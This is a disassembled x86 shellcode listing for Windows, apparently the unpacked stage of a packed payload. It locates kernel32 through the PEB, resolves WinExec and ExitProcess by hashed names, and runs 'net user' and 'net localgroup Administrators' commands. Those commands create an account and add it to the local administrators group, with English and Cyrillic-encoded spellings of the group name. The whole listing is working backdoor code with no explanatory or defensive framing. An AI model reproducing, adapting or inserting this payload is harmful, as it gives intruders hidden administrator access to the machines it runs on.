; Segment type: Pure code
;seg000 segment byte public 'CODE' use32
; assume cs:seg000
; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C = byte ptr -29Ch
var_28C = byte ptr -28Ch
var_25F = byte ptr -25Fh
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
seg000 segment byte public 'CODE' use32
beginofpackeddata: ; CODE XREF: UnXORFunc+17j
push ebp
mov ebp, esp
sub esp, 80h
mov esi, esp
call sub_191
push eax
mov eax, fs:18h
mov eax, [eax+30h]
lea eax, [eax+18h]
mov ebx, 190000h
mov [eax], ebx
pop eax
mov [esi], eax
push dword ptr [esi]
push 0E8AFE98h
call GetFunctionBYName ;WinExec
mov [esi+0Ch], eax
push dword ptr [esi]
push 73e2d87eh
call GetFunctionBYName ;ExitProcess
mov [esi+10h], eax
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a a '
push 'resu'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a û'
push 'ðîòà'
push 'ðòñè'
push 'íèìä'
push 'À pu'
push 'orgl'
push 'acol'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a ë'
push 'à®â'
push 'àâá¨'
push '¨¬¤'
push ' pu'
push 'orgl'
push 'acol'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a s'
push 'rota'
push 'rtsi'
push 'nimd'
push 'A pu'
push 'orgl'
push 'acol'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
push 0h
call dword ptr [esi+10h] ;
; end
; S U B R O U T I N E
GetFunctionBYNameproc near ; CODE XREF: UnXORFunc+31p
; UnXORFunc+40p ...
arg_0 = dword ptr 14h
arg_4 = dword ptr 18h
push ebx
push ebp
push esi
push edi
mov ebp, [esp+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_1B2: ; CODE XREF: GetFunctionBYName+36j
jecxz short loc_1E6
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_1BD: ; CODE XREF: GetFunctionBYName+30j
xor eax, eax
lodsb
cmp al, ah
jz short loc_1CB
ror edi, 0Dh
add edi, eax
jmp short loc_1BD
;
loc_1CB: ; CODE XREF: GetFunctionBYName+29j
cmp edi, [esp+arg_0]
jnz short loc_1B2
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_1E8
;
loc_1E6: ; CODE XREF: GetFunctionBYName+19j
xor eax, eax
loc_1E8: ; CODE XREF: GetFunctionBYName+4Bj
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
retn 4
GetFunctionBYName endp
sub_191 proc near ; CODE XREF: sub_76+Bp
push ebp
push esi
mov eax, fs:30h
test eax, eax
js short loc_1A9
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp short loc_1B2
;
loc_1A9: ; CODE XREF: sub_191+Aj
mov eax, [eax+34h]
mov ebp, [eax+0B8h]
loc_1B2: ; CODE XREF: sub_191+16j
mov eax, ebp
pop esi
pop ebp
retn 4
sub_191 endp
;
seg000 ends
end
